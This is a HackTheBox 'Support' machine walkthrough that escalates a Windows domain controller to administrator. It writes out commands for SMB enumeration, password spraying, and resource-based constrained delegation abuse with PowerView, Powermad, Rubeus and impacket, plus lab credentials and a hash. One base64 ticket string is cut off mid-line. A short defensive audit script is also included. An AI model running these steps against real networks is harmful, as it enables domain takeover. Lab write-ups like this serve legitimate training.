Hello guys, today I would like to share with you my walkthrough of the Support machine on HackTheBox.
Notice:
The target IP changes partway through because I had to respawn my machine due to lack of connectivity.
Let’s start with an Nmap scan.
I used the following command:
nmap -sC -sV -A -O -Pn 10.129.37.214
This is the output I got:
Ok, after I found that there is an SMB port open, I tried to enumerate the users with the SMB lookupsid scanner module in msfconsole.
This is the output I got:
Nothing special; I saved the output to a text file to use it later.
Let's try enumerating with enum4linux, with the following command:
enum4linux -U 10.129.37.214
Ok, nothing special. Let's try enumerating the SMB shares and see if we can access one of them.
Write the following command:
smbclient -L 10.129.37.214 -N
- -L lists the shares
- -N logs in with no password
'support-tools' really caught my eye, so I tried to connect to the share without any creds, with the following command:
smbclient \\\\10.129.37.214\\support-tools -N
Ok, so going through the file names I right away saw UserInfo.exe.zip, which is very interesting.
I used the 'get' command to download it to my machine. Make sure you are in a super user session in your terminal, otherwise downloading files to your machine can fail.
I sent the zip to my email so I could decompile it with dnSpy.
While navigating through the source code of UserInfo.exe I found this:
Looks like a base64 encoded string with the key 'armando'.
I built a little script in Python to try to decrypt it:
The output I got was:
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
That was one of the times I really didn't know what to do with this output.
After a couple of Google searches and scrolling through my old HTB machine reports, I remembered I had once seen something similar and had used ldapsearch!
After a couple of tries I actually managed to find a password with ldapsearch, by binding as the ldap user with the password I had just decoded.
With the following command:
ldapsearch -D support\\ldap -H ldap://10.129.37.214 -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'CN=Users,DC=support,DC=htb' | grep info:
So after I found the password, I tried a password spraying attack with a custom made user list.
1. support
2. admin
3. administrator
4. Guest
5. agent
I tried the password spraying attack with crackmapexec, with the following command:
crackmapexec winrm 10.129.37.214 -u 'home/htb-kimd15/Desktop/users.txt' -p Ironside47pleasure40Watchful
Connecting through evil-winrm with the creds I found:
Navigating through the folders, I found the user flag!
So we are halfway done :). We now need privilege escalation.
Follow these steps carefully and don't skip anything, otherwise it won't work.
In order to elevate our privileges we first need to download two scripts to our attacking machine.
The two scripts are called PowerView and Powermad. They will allow us to create a new machine account in the domain and impersonate the administrator, and finally to elevate our privileges.
Type in your terminal:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
After we download the scripts, we can upload them with evil-winrm to the victim machine. Once we upload them we need to import them as modules into the PowerShell environment:
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
After we import the modules we need to check whether we are allowed to create users.
Get-DomainObject -Identity "dc=support,dc=htb"
Now let's check that the target machine is at least Windows Server 2012, so our exploit will work.
Get-DomainController "htb" -Domain support.htb
Finally, we have to check that the target machine does not already have the attribute msds-allowedtoactonbehalfofotheridentity set.
Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity
After we have checked all the necessary parameters for the exploit to work, let's create a new user (a machine account)!
New-MachineAccount -MachineAccount kim -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Get-DomainComputer
Now we should create a raw security descriptor for the 'kim' user we just created. Remember to change the SID to the one we found at the start of the walkthrough.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
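Whether you are setting this attribute or auditing a domain for it, the useful question is who the descriptor actually grants delegation to. The following Python script is an added example and not part of the original walkthrough: it parses an msds-allowedtoactonbehalfofotheridentity descriptor in SDDL string form (the same form built above, reused here as the constructed sample) and reports every principal that is not on an expected list. The RIGHTS table, the function names and the expected-SID list are assumptions of this example.

```python
import re

# SDDL access-right abbreviations: the generic rights plus the directory-service set.
# Assumption of this example: the descriptor is available in SDDL string form.
RIGHTS = {
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE", "LO": "LIST_OBJECT",
    "CR": "CONTROL_ACCESS", "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER",
}

# One ACE string: (type;flags;rights;object_guid;inherit_object_guid;sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^;)]*)\)")


def decode_rights(rights):
    """Turn 'CCDCLC...' into right names; a hex mask such as 0x1f01ff is returned as-is."""
    if rights.startswith("0x"):
        return [rights]
    return [RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]


def parse_rbcd_sddl(sddl):
    """Return the access-allowed ACEs of the DACL as {'sid': ..., 'rights': [...]} dicts.

    An empty list means nobody may act on behalf of other identities for this
    computer (attribute absent or DACL empty)."""
    if "D:" not in sddl:
        return []
    dacl = sddl.split("D:", 1)[1]
    entries = []
    for ace_type, _flags, rights, _oguid, _ioguid, sid in ACE_RE.findall(dacl):
        if ace_type != "A":          # deny and audit ACEs do not grant delegation
            continue
        entries.append({"sid": sid, "rights": decode_rights(rights)})
    return entries


def audit_rbcd(sddl, expected_sids=()):
    """SIDs allowed to delegate to this computer that are not on the approved list."""
    return [e["sid"] for e in parse_rbcd_sddl(sddl) if e["sid"] not in expected_sids]


# Constructed sample: the descriptor string built in the walkthrough above.
SAMPLE_SDDL = ("O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
               "S-1-5-21-1677581083-3380853377-188903654-5101)")

if __name__ == "__main__":
    for entry in parse_rbcd_sddl(SAMPLE_SDDL):
        print(entry["sid"], ",".join(entry["rights"]))
    print("unexpected delegation from:", audit_rbcd(SAMPLE_SDDL))
```

Any SID reported by audit_rbcd on a domain controller is worth a ticket, since a writable machine account with these rights is exactly what the steps above rely on.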
Now the juicy part: let's try to impersonate the administrator!
First, download Rubeus.exe to your attacking machine and upload it to the victim; we need it to generate the RC4 hash of the password.
From your attacker machine:
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Navigate back to evil-winrm and type this:
upload Rubeus.exe
.\Rubeus.exe hash /password:123456 /user:kim /domain:support.htb
After we have generated the RC4 hash, we can request a Kerberos ticket for 'kim' while impersonating the administrator. Remember to change the RC4 hash and username to your own.
.\Rubeus.exe s4u /user:kim$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
Now write the ticket (the base64 output from Rubeus) to a file on the victim machine so we can download it:
[IO.File]::WriteAllBytes("C:\Users\support\Documents\ticket.kirbi", [Convert]::FromBase64String("doIGYDCCBlygAwIBBaEDAgEWooIFcjCCBW5hggVqMIIFZqADAgEFoQ0bC1NVUFBPUlQuSFRCoiEwH6ADAgECoRgwFhsEY2lmcxsOZ
Now download it
download ticket.kirbi
Now let's make the ticket usable.
Requirements:
- impacket
- pyasn1
- ticket_converter.py
- krb5-user
sudo apt update
pip3 install impacket
pip3 install pyasn1
wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
sudo apt install krb5-user
Very important! Delete our existing tickets on our attacking machine with the following command:
kdestroy
Now let's convert our ticket into a usable format:
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
Now we must map the support.htb domain to the target IP in our hosts file. Type:
vim /etc/hosts
After adding a line with the target IP followed by the domain names (support.htb and dc.support.htb, as used in the command below), press 'esc' and then write ':wq'.
This will save and exit.
Finally we can use the ticket to connect the machine as admin
impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k
- -k uses the Kerberos ticket we imported.
Now just navigate to the Desktop folder and read the flag with:
type root.txt
Thank you for reading,
Kim.